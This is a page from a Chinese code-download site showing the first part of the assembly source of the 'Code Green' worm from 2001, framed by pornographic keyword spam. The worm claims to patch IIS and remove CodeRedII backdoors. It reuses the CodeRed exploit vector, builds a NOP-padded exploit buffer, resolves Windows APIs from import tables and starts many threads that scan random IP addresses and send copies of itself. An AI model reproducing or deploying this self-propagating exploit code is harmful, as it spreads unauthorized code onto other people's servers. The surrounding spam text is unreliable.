亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? codegreen.asm

?? 蠕蟲—綠色代碼的源程序
?? ASM
?? 第 1 頁 / 共 3 頁
字號:
; Code Green (AntiCodeRed/IDQPatcher/whatever you want) V1.0 BETA [23.08.2001]
; assemble with:
; 	ML /Dmasm /c /Cx /coff CodeGreen.asm
; link with:
; 	LINK CodeGreen.obj /entry:_Entry /subsystem:windows /base:65536

;aims:
; * patch vulnerable systems
; * remove CodeRedII backdoors

;known problems:
; * plenty of probs ... ;(
; * propagation threads will stop (criticalsection), in case only one thread should block while sending
; * don't know if CodeGreen will correctly determine system language
; * don't know if CG will correctly apply patch to all systems
; * don't know if this code would work at all (had not enough time to exessively debug it;()

;known bugs:
; * currently none (inform me if you should find some weak code)

;credits:
; * @eEye: you guys surely did great work finding that bug
; * @MS: thanks for delivering a hotfix that works with system privileges
;	(plus: does not show messagebox when executed with system privileges;))
; * @CodeRedI author: thanks for this great exploit vector; good job
; * @CodeRedII author: sorry for providing code/the base for a code
;	that will/could potentially take your systems
; * @all: it's my first one ...
;	... so please don't flame me for weak coding ...
;	... be nice guys and send me your modified versions of this code.

;debug instructions:
; * assemble CodeGreen.asm
     (or remove txt-extension from CodeGreen.exe.txt [at your own risk])
; * debug your iis
; * go to 0x7801CBD3h (call ebx)
; * set breakpoint there
; * execute betaversion and walk through the code
; * be sure to stay offline, especially when using the preassembled version

;DISCLAIMER:
; (blahblah) ... i will not take responsibility for any bugy in this code
;(THIS IS ONLY A BETA VERSION, WHICH HAS BUGS IN IT).
;in fact i will not take responsibility for this code/included files at all.
;if you use this code or the pre-assembled version, you should know what you are doing.
;hell ... if you can't keep the code on your local iis, it's your fault.
;(i really don't know if this code is working at all
; ... currently it's 10:20 a.m. in germany and it's getting pretty late ...
; ... but tomorry i will be on vacation and perhaps there might be someone out there,
; who could finish my work.)

;sidenote: i did not have the time to optimize the code and to
	write some nice comments; sorry.

.386
.model flat, stdcall
option casemap:none

; ***** ***** Includes ***** *****

	include windows.inc
	include kernel32.inc
	include advapi32.inc
	include wsock32.inc
	includelib kernel32.lib
	includelib advapi32.lib
	includelib wsock32.lib

CGLen EQU CGEnd - CGBegin
CGInitLen EQU CGEnd - CGInit
UDataLen EQU UDataEnd - UDataBegin

.Code

CGInit EQU $
	_Entry:
		.Data
			OldProtection	DD	0
		.Code
			call AdjustCodeSegment
		AdjustCodeSegment:
			pop ebp
			mov eax, CGInitLen
			invoke VirtualProtect, ebp, eax, PAGE_EXECUTE_READWRITE, offset OldProtection
			cmp eax, TRUE
			je _Prologue2
				INT 3
				call GetLastError
				ret

	_Prologue2:
		.Data
			msvcrt_dll	DB	"msvcrt.dll", 0
		.Code
		invoke LoadLibrary, offset msvcrt_dll
			mov esi, eax						;esi -> msvcrt.dll
			add esi, 00050824h
			cmp eax, NULL
			jne _DEBUG ;_CGEntry
				INT 3
				call GetLastError
				ret

	_DEBUG:
		call LaengeCodeGreenCodeBerechnen

	_CGInit:
		.Data
			CGInit_WSAData			DW	0
							DW	0
							DB	257 DUP (0)
							DB	257 DUP (0)
							DW	0
							DW	0
							DD	0

			CGInit_CurrentIP		DD	7F000001h
			CGInit_IoctlSocket_Arg		DD	0
			CGInit_SockAddr			DW	0
							DW	0
							DD	0
							DD	2 DUP (0)
			CGInit_fd_set			DD	1
							DD	1
							DD	63 DUP (0)
		.Data?
			CGInit_CGCodeLen		DD	0 ;Code
			CGInit_CGLen			DD	0 ;Exploit+Code
			CGInit_NewCodeGreen		DB	6000 DUP (?)
		.Code
		call LaengeCodeGreenCodeBerechnen
		xor ebp, ebp ;set initial base-pointer
		jmp CGInit_Get_Used_PropagationThreadFunctions

			LaengeCodeGreenCodeBerechnen:
			pushad
				mov eax, CGLen
				mov [CGInit_CGCodeLen], eax
				lea esi, CodeGreenExploitLenStr

				xor edx, edx
				mov ecx, 1000
				div ecx ;EDX-EAX:ECX Rest:edx Erg:eax
				add eax, 48
				mov [esi], al
				mov eax, edx

				xor edx, edx
				mov ecx, 100
				div ecx
				add eax, 48
				mov [esi+1], al
				mov eax, edx

				xor edx, edx
				mov ecx, 10
				div ecx
				add eax, 48
				mov [esi+2], al
				mov eax, edx

				add eax, 48
				mov [esi+3], al
			popad
			ret


	CGInit_Get_Used_PropagationThreadFunctions:

		mov eax, EnterCriticalSection
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_EnterCriticalSection], eax

		mov eax, LeaveCriticalSection
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_LeaveCriticalSection], eax

		mov eax, socket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_socket], eax

		mov eax, ioctlsocket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_ioctlsocket], eax

		mov eax, connect
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_connect], eax

		mov eax, select
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_select], eax

		mov eax, send
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_send], eax

		mov eax, closesocket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_closesocket], eax

		mov eax, GetSystemTime
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_GetSystemTime], eax

		mov eax, Sleep
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_Sleep], eax

	CGInit_BuildCodeGreen:
		lea esi, [ebp][CodeGreenExploit]
		mov eax, CGExploitLen + CGLen
		mov ecx, eax
		shr ecx, 2 ;div 4
		inc ecx
		mov ebx, ecx	;ebx: NrOfPushs
		CGInit_ReserveStackLoop:
			push 090909090h
			loop CGInit_ReserveStackLoop
			push ebx	;first DW in stack-field holds NrOfPushs

			mov [ebp][ptrNewCodeGreen], esp

		CGInit_CopyCodeGreenExploit:
			mov ecx, CGExploitLen ;eax
			lea edi, [esp+4]
			cld
			rep movsb

		CGInit_AddCodeGreenCode:
			lea esi, [ebp][_CGEntry]
			mov ecx, CGLen
			rep movsb

	CGInit_StartPropagation:
		mov [ebp][NrOfThreads], word ptr 0
		mov [ebp][EndThreadsFlag], byte ptr 0
		mov [ebp][CurrentIP], dword ptr 7F000000h ;does propagation thread only send one copy to the local IIS?
			;7FFFFFFDh ;=127.255.255.254 => no random IP generation, hits local Port 80 1 time

		CGInit_InitializeSockets:
				push offset CGInit_WSAData
				push 0101h
			CALL WSAStartup

		CGInit_Main_StartRandomGenerator:
			push 0
				push esp
				push 0
				push ebp
				lea eax, [ebp][RandomGenerator]
				push eax
				push 0
				push 0
			CALL CreateThread
			pop eax

		CGInit_Initialise_Critical_Sections:
			lea eax, [ebp][CritSec_GetIP]
				push eax
			CALL InitializeCriticalSection

			lea eax, [ebp][CritSec_SendCG]
				push eax
			CALL InitializeCriticalSection

		CGInit_Propagation_ThreadLoop:
			push 0
				push esp
				push 0
				push ebp
				lea eax, [ebp][_ThreadFunction]
				push eax
				push 0
				push 0
			CALL CreateThread
			pop eax

				push 100
			CALL Sleep
		cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS
		jl CGInit_Propagation_ThreadLoop

	CGInit_ResetPropagation:

		CGInit_Main_WaitLoop:
				push 60000	;60 secs
			CALL Sleep

			CGInit_Main_StartRandomIPSearchAgain:
				lea edx, [ebp][CritSec_GetIP]	;EnterCriticalSection
					push edx
				CALL EnterCriticalSection
			mov [ebp][CurrentIP], dword ptr 0
				lea edx, [ebp][CritSec_GetIP]	;LeaveCriticalSection
					push edx
				CALL LeaveCriticalSection
		jmp CGInit_Main_WaitLoop

;*********************************************************************************************************************************
;************************************************   EXPLOIT VECTOR   *************************************************************
;*********************************************************************************************************************************
	;esp: 7801CBD3h;		[7801CBD3]:	FF 29	call ebx
	;      ->00D3F0E8 90                  nop
	;	00D3F0E9 90                   nop
	;	00D3F0EA 58                 ! pop         eax
	;	00D3F0EB 68 D3 CB 01 78     ! push        7801CBD3h
	;	00D3F0F0 90                   nop
	;	00D3F0F1 90                   nop
	;	00D3F0F2 90                   nop
	;	00D3F0F3 90                   nop
	;	00D3F0F4 90                   nop
	;	00D3F0F5 81 C3 00 03 00 00    add         ebx,300h
	;	00D3F0FB 8B 1B                mov         ebx,dword ptr [ebx]
	;	00D3F0FD 53                 ! push        ebx				(ebx: 00B02698h)
	;	00D3F0FE FF 53 78           ! call        dword ptr [ebx+78h]		pushes 00D3F100h
	;Stack:
	;	[esp]: 00D3F100h, 00B02698h(esp+4), 7801CBD3h(esp+8)
;*********************************************************************************************************************************
;**************************************************   WORM CODE   ****************************************************************
;*********************************************************************************************************************************
CGBegin EQU $
	_CGEntry:
		call _GetEIP
	_GetEIP:
			;00011000 E8 00 00 00 00       call        00011005
			;00011005 5D                   pop         ebp				;ebp > 00011005 z.B. ebp=00401005
			;00011006 B8 06 10 01 00       mov         eax,11006h
			;0001100B 48                   dec         eax				;eax=11005 (STATISCH!)
			;0001100C 55                   push        ebp
			;0001100D 2B E8                sub         ebp,eax			;ebp = ebp - eax	=> Variablenangleichung m鰃lich!
			;0001100F 58                   pop         eax
			;00011010 83 E8 05             sub         eax,5			;eax -> _Entry		=> wir haben komfortablen Zeiger auf den VirenCode!

		pop ebp
		mov eax, $
		dec eax							;eax=11005 (STATISCH!); d.h.: eax zeigt auf "pop ebp"
		push ebp
			sub ebp, eax					;ebp -> (_CGEntry - eax); d.h.: ebp + offset VAR = EffectiveAddressOf Var
		pop eax
		sub eax, 5						;eax -> _CGEntry (VARIABEL!)
		;mov [ebp][BasePointerCode], eax

	push ebp			;Push the BasePointer to stack

	;**********************************************************************************
	;***                              init                                     ***
	;**********************************************************************************

	_GetMsvcrtBaseAndSearchGetProcAddrEntry:
		mov esi, 78000000h ;[esp+12]			;esi: 7801CBD3h (see above)

		;call SearchMZHeader

		lea ebx, [ebp][Str_GetProcAddr]
		mov ecx, Len_GetProcAddr
		mov ebp, dword ptr esi

		mov esi, dword ptr [esi+3Ch]
		add esi, ebp

		mov esi, dword ptr [esi+80h]	;78h=ExportTable 80h=ImportTable
		add esi, ebp

		mov edi, esi			;edi -> ImageImportTable
		sub edi, 14h
		SearchIMAGE_IMPORT_DESCRIPTORs:
			add edi, 14h		;edi -> nextImportDescriptor
			mov esi, [edi+12]		;esi -> Name
			add esi, ebp
			mov esi, [esi]
			cmp esi, "NREK"
			jne SearchIMAGE_IMPORT_DESCRIPTORs

		IMAGE_KERNEL_IMPORT_DESCRIPTOR_Found:	;edi -> KernelImportDescriptor
			mov esi, [edi+10h]		;esi -> PIMAGE_THUNK_DATA (Address-Table)
			add esi, ebp		;[ebp][MsvcrtBase]
			mov edi, [edi]			;edi -> IMAGE_IMPORT_BY_NAME - Pointers (Name-Table)
			add edi, ebp		;[ebp][MsvcrtBase]

			xchg ebx, esi			;ebx=esi; esi -> Str_GetProcAddr

			xor edx, edx			;edx : Z鋒ler

			cld
		SearchPointerTableLoop:
			inc edx		
			pushad
				add [esp], dword ptr 4 ;"add edi, 4" after "popad"
				mov edi, [edi]
				add edi, ebp
				add edi, 2		;edi -> ProcName ;shl edi ...
				CompareTheTwoNames:
					repe cmpsb
			popad
			jnz SearchPointerTableLoop ;the strings are not equal

		FunctionFound: ;edx: NrIn_IMPORT_TABLE
			dec edx
			shl edx, 2 ;edx=edx*4
			add ebx, edx
			mov edx, [ebx]						;EDX: GetProcAddr

	pop ebp
		mov [ebp][ProcTable+API_GetProcAddr], edx
		mov esi, edx

		call SearchMZHeader		;esi -> KernelBase

		lea edi, [ebp][DllTable]
	push edi
		mov [edi], esi

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
久久只精品国产| 视频一区欧美精品| 久久夜色精品国产欧美乱极品| 91国产免费看| 91在线视频官网| 99久久免费国产| eeuss鲁一区二区三区| 成人污视频在线观看| 国产精品一区免费在线观看| 国产一区二三区| 国产伦精一区二区三区| 国产一区二区在线观看视频| 寂寞少妇一区二区三区| 韩国欧美一区二区| 国产老妇另类xxxxx| 国产成人在线电影| 国产福利视频一区二区三区| 国产精品影视在线观看| 成人网页在线观看| 99九九99九九九视频精品| 91丨porny丨户外露出| 色综合色综合色综合色综合色综合| 99麻豆久久久国产精品免费优播| 99久久精品久久久久久清纯| 97aⅴ精品视频一二三区| 在线一区二区观看| 欧美剧在线免费观看网站 | 欧美图区在线视频| 欧美三级午夜理伦三级中视频| 欧美亚洲国产一区二区三区va| 欧美日本一道本| 亚洲精品在线三区| 国产精品久久久久四虎| 亚洲国产成人高清精品| 免费看黄色91| 丁香婷婷综合网| 色婷婷av一区二区三区软件| 精品视频免费看| 精品精品欲导航| 国产精品久久看| 午夜精彩视频在线观看不卡| 国内偷窥港台综合视频在线播放| 成人美女视频在线观看| 欧美日韩一区在线观看| 精品国产乱码久久久久久蜜臀| 国产日韩欧美不卡| 亚洲午夜精品17c| 激情五月婷婷综合| 色综合久久久久综合99| 日韩欧美国产精品| 中文字幕亚洲不卡| 日韩综合在线视频| 高清不卡在线观看av| 欧美在线999| 久久午夜电影网| 午夜精品久久久久久久| 成人亚洲一区二区一| 欧美亚洲国产一区二区三区| 久久亚区不卡日本| 亚洲综合色噜噜狠狠| 极品少妇一区二区| 亚洲久本草在线中文字幕| 日韩激情在线观看| 成人福利在线看| 精品三级在线观看| 亚洲一二三四在线| 国产精品18久久久久久久网站| 欧美视频三区在线播放| 日本一区二区三区在线不卡| 免费人成网站在线观看欧美高清| 99re在线精品| 久久久www成人免费毛片麻豆| 亚洲国产精品久久久久婷婷884| 国产伦理精品不卡| 91精品福利在线一区二区三区| 亚洲欧洲日韩在线| 国产一区二区三区久久久| 欧美日韩1区2区| 亚洲精品高清视频在线观看| 国产成人av一区| 欧美哺乳videos| 日日摸夜夜添夜夜添精品视频| 91麻豆精品秘密| 国产精品丝袜一区| 激情图片小说一区| 3atv一区二区三区| 亚洲成人福利片| 色悠悠久久综合| 国产精品久久久久一区二区三区| 处破女av一区二区| 偷拍亚洲欧洲综合| 91同城在线观看| 欧美国产欧美综合| 激情久久久久久久久久久久久久久久| 欧美日韩中字一区| 夜夜爽夜夜爽精品视频| eeuss影院一区二区三区| 中文字幕不卡在线播放| 黄色日韩三级电影| 日韩精品一区在线| 久久99久久99精品免视看婷婷| 7777精品伊人久久久大香线蕉的 | 一区二区三区波多野结衣在线观看| 麻豆一区二区99久久久久| 欧美一a一片一级一片| 亚洲少妇30p| 91久久国产最好的精华液| 国产精品国产三级国产aⅴ无密码 国产精品国产三级国产aⅴ原创 | 91精品国产色综合久久不卡电影 | 另类的小说在线视频另类成人小视频在线| 欧美亚州韩日在线看免费版国语版 | 国产精品久久三| 懂色av中文一区二区三区 | 国产美女一区二区三区| 久久综合久久综合九色| 国产福利一区在线| 国产精品美女视频| 99riav一区二区三区| 一个色综合网站| 欧美日韩一区二区三区高清| 天天综合网 天天综合色| 91精品欧美久久久久久动漫| 老色鬼精品视频在线观看播放| 亚洲成人综合视频| 欧美日本国产视频| 美女精品一区二区| 久久久噜噜噜久久中文字幕色伊伊 | 日本视频一区二区| 91精品国产一区二区三区| 美国精品在线观看| 久久久蜜桃精品| 91在线高清观看| 天堂久久一区二区三区| 日韩精品一区二区在线观看| 国产精品资源在线| 亚洲欧洲韩国日本视频| 欧美视频一区二区三区四区| 美女视频黄 久久| 中文欧美字幕免费| 色菇凉天天综合网| 日本中文一区二区三区| 欧美国产日韩精品免费观看| 99精品久久免费看蜜臀剧情介绍| 亚洲一区在线免费观看| 日韩精品一区二区三区swag| 成人免费视频国产在线观看| 亚洲男人的天堂在线aⅴ视频| 91精品国产欧美一区二区成人| 国产在线看一区| 一区二区三区中文字幕| 日韩一级视频免费观看在线| 粉嫩av一区二区三区| 亚洲成人动漫精品| 久久久久久久一区| 欧洲视频一区二区| 精品一区二区三区免费播放| 中文字幕一区二区三区视频| 69av一区二区三区| 99这里只有精品| 男女男精品视频网| 成人欧美一区二区三区白人| 91麻豆精品国产91久久久久久| 国产成人在线看| 日韩精品一级中文字幕精品视频免费观看| 国产亚洲一区字幕| 欧美偷拍一区二区| 99视频有精品| 久草在线在线精品观看| 亚洲综合一区在线| 国产精品网曝门| 日韩午夜激情av| 欧美主播一区二区三区| 东方欧美亚洲色图在线| 麻豆精品一二三| 亚洲国产精品视频| 国产精品成人免费| 日韩你懂的在线观看| 欧美亚洲日本国产| 9色porny自拍视频一区二区| 精品写真视频在线观看| 日韩电影一区二区三区四区| 亚洲欧洲日韩在线| 久久久99免费| 日韩精品资源二区在线| 欧美日韩国产另类一区| 色综合天天综合网天天狠天天| 国产精品自拍一区| 久久精品国内一区二区三区| 亚洲国产美女搞黄色| 中文字幕一区二区不卡| 26uuu色噜噜精品一区二区| 欧美精品一卡二卡| 欧美性生活影院| 在线欧美小视频| 91网站最新网址| thepron国产精品| eeuss鲁一区二区三区| 国产.精品.日韩.另类.中文.在线.播放| 精品在线免费视频| 日本视频一区二区三区|